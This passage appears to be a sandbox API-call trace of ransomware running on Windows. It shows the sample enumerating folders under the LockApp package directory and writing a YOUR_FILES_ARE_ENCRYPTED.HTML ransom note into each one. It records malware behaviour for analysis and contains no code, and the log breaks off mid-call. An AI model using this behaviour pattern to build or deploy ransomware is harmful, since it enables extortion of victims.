lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies\\*" [0115.972] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.973] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.973] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.973] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.973] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.973] GetProcessHeap () returned 0x600000 [0115.973] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.974] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.975] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.976] CloseHandle (hObject=0x324) returned 1 [0115.976] GetProcessHeap () returned 0x600000 [0115.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.976] GetProcessHeap () returned 0x600000 [0115.976] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.978] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0115.978] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.978] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory") returned 95 [0115.978] GetProcessHeap () returned 0x600000 [0115.978] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.979] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory" [0115.979] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory\\*" [0115.979] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.980] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.980] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.980] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.980] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 125 [0115.980] GetProcessHeap () returned 0x600000 [0115.980] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.981] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.981] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.983] CloseHandle (hObject=0x324) returned 1 [0115.983] GetProcessHeap () returned 0x600000 [0115.983] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.983] GetProcessHeap () returned 0x600000 [0115.983] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.983] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 1 [0115.983] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.983] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp") returned 88 [0115.983] GetProcessHeap () returned 0x600000 [0115.983] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x30f2fc0 [0115.983] lstrcpyW (in: lpString1=0x30f2fc0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp" [0115.983] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp\\*" [0115.983] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0115.984] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 1 [0115.984] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62f590, dwReserved1=0x631190, cFileName="..", cAlternateFileName="")) returned 0 [0115.984] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0115.984] wnsprintfW (in: pszDest=0x30f2fc0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0115.984] GetProcessHeap () returned 0x600000 [0115.984] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.984] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0115.985] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0115.986] CloseHandle (hObject=0x324) returned 1 [0115.986] GetProcessHeap () returned 0x600000 [0115.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.986] GetProcessHeap () returned 0x600000 [0115.986] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x30f2fc0 | out: hHeap=0x600000) returned 1 [0115.986] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6278a182, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6278a182, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6278a182, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="Temp", cAlternateFileName="")) returned 0 [0115.986] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.987] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 113 [0115.987] GetProcessHeap () returned 0x600000 [0115.987] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.987] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.987] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.988] CloseHandle (hObject=0x32c) returned 1 [0115.989] GetProcessHeap () returned 0x600000 [0115.989] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.989] GetProcessHeap () returned 0x600000 [0115.989] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.990] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0115.990] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.990] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData") returned 88 [0115.990] GetProcessHeap () returned 0x600000 [0115.990] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.991] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData" [0115.992] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData\\*" [0115.992] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626638 [0115.992] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.992] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62717b51, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x62717b51, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x62717b51, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.992] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0115.992] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 118 [0115.992] GetProcessHeap () returned 0x600000 [0115.992] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.993] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.lockapp_cw5n1h2txyewy\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0115.993] WriteFile (in: hFile=0x32c, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0115.995] CloseHandle (hObject=0x32c) returned 1 [0115.995] GetProcessHeap () returned 0x600000 [0115.995] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0115.995] GetProcessHeap () returned 0x600000 [0115.995] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0115.995] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6259a316, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6259a316, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6259a316, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="LocalCache", cAlternateFileName="LOCALC~1")) returned 1 [0115.995] StrStrIW (lpFirst="LocalCache", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0115.995] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache") returned 91 [0115.995] GetProcessHeap () returned 0x600000 [0115.995] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x314b010 [0115.996] lstrcpyW (in: lpString1=0x314b010, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache" [0115.996] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache\\*" [0115.996] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6259a316, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6259a316, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6259a316, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626838 [0115.996] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6259a316, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6259a316, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6259a316, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0115.997] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6259a316, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x6259a316, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6259a316, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122a, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0115.997] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0115.997] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.LockApp_cw5n1h2txyewy\\LocalCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 121 [0115.997] GetProcessHeap () returned 0x600000 [0115.997] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0115.997] CreateFileW 